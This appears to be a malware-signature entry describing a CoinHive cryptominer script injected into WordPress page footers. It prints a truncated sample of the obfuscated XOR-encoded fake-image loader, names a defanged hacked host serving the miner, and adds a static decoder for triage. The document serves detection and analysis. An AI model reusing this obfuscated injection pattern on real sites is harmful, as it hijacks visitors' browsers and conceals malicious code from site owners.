
Malware entry: malware.cryptominer.1

Description: The website contains a script that, among other things, injects a CoinHive JavaScript miner into the browsers of site visitors.

The script is typically injected into the footer section of web pages. It hides from search engine bots and changes frequently. The main decoded part looks like a fake base64-encoded image:

<scr​ipt type="text/javascript"<
var aa9​5f71="data:​image/jpg;base64​,d8e4bc​b1aef8abaca1b4bde5faa8b7abb1acb1b7b6e2f8b9baabb7b4adac...skipped...aee6d2==";
for (var i=​24; i<aa95f71.length-​2; i+=2) 
document .​write(String​.fromCharCode(​parseInt(aa95f71[​i]+""+aa95f71[i+1]​,16)​^parseInt(aa95f71[​22]+""+aa95f71[​23],​16)));</script<
This script loads a CoinHive miner from a hacked third-party site hxxp://oneyoungcome[.]com/jqueryui.js. The script may also redirect certain visitors to ad sites or inject other malicious scripts.
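For triage, the fake image can be located and decoded statically, without ever rendering the page. The sketch below is an added example, not part of the original signature entry: the function names, the constructed page source and the appended `==` terminator are assumptions, and the hex string is only the leading fragment visible in the sample above.

```javascript
// Added example for analysis: decodes the blob statically, never calls document.write or eval.
const PREFIX = "data:image/jpg;base64,"; // 22 chars, so the key pair sits at indexes 22-23

// Visible leading fragment of the page's sample (zero-width characters removed);
// the closing "==" is appended here because the page elides the rest of the blob.
const SAMPLE = PREFIX + "d8e4bcb1aef8abaca1b4bde5faa8b7abb1acb1b7b6e2f8b9baabb7b4adac" + "==";

// Mirror the injected loop: key = first hex pair, then XOR every following pair,
// stopping 2 characters before the end (the fake base64 padding).
function decodeFakeImage(blob) {
  if (!blob.startsWith(PREFIX)) throw new Error("not the fake-image prefix");
  const hex = blob.slice(PREFIX.length, blob.length - 2);
  if (hex.length < 4 || hex.length % 2 !== 0 || !/^[0-9a-f]+$/i.test(hex)) {
    throw new Error("payload is not a run of hex pairs");
  }
  const key = parseInt(hex.slice(0, 2), 16);
  let out = "";
  for (let i = 2; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16) ^ key);
  }
  return out;
}

// Flag "images" whose base64 body is purely hex pairs: a real JPEG data URI
// starts with "/9j/", which is not hex, so it is skipped.
function findSuspectBlobs(html) {
  const re = /data:image\/jpg;base64,(?:[0-9a-fA-F]{2}){2,}==/g;
  return html.match(re) || [];
}

// Constructed page source: one genuine-looking image and one injected variable.
const PAGE = '<img src="data:image/jpg;base64,/9j/4AAQSkZJRg==">' +
  '<script>var aa95f71="' + SAMPLE + '";</script>';

// Return the XOR key and decoded text for every suspect blob in the page source.
function analyze(html) {
  return findSuspectBlobs(html).map((b) => ({ key: b.slice(22, 24), text: decodeFakeImage(b) }));
}

console.log(analyze(PAGE));
```

The visible fragment decodes to the start of an absolutely positioned `div`, which is consistent with markup written into the page footer.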



Affecting: WordPress sites.

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb